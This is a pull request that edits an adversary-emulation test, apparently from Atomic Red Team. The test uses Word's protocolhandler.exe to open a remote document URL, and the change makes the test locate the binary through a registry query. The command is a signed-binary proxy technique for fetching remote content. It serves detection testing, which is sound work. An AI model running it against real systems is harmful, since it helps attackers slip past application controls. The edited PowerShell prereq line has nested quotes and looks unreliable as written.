### PR TITLE
programatically determine location of protocolhandler

### DIFF
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -102,10 +102,6 @@ atomic_tests:
   supported_platforms:
     - windows
   input_arguments:
-    microsoft_wordpath:
-      description: path to office folder
-      type: path
-      default: C:\Program Files\Microsoft Office\root\Office16
     remote_url:
       description: url to document
       type: url
@@ -115,14 +111,15 @@ atomic_tests:
     - description: |
         Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided
       prereq_command: | 
-        if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") {exit 0} else {exit 1}
+        if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
       get_prereq_command: | 
         write-host "Install Microsoft Word or provide correct path."
   executor:
     name: command_prompt
     elevation_required: false
     command: |
-      "#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
+      FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
+      call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
 - name: Microsoft.Workflow.Compiler.exe Payload Execution
   auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e
   description: |


### PR DESCRIPTION
This atomic was expecting to find protocolhandler.exe in the "program files" directirt but in my case it is found in "program files (x86)" and which directory it is in is related to whether 32 bit or 64 bit office is installed. This modification determines the path programatically so it will work from either directory.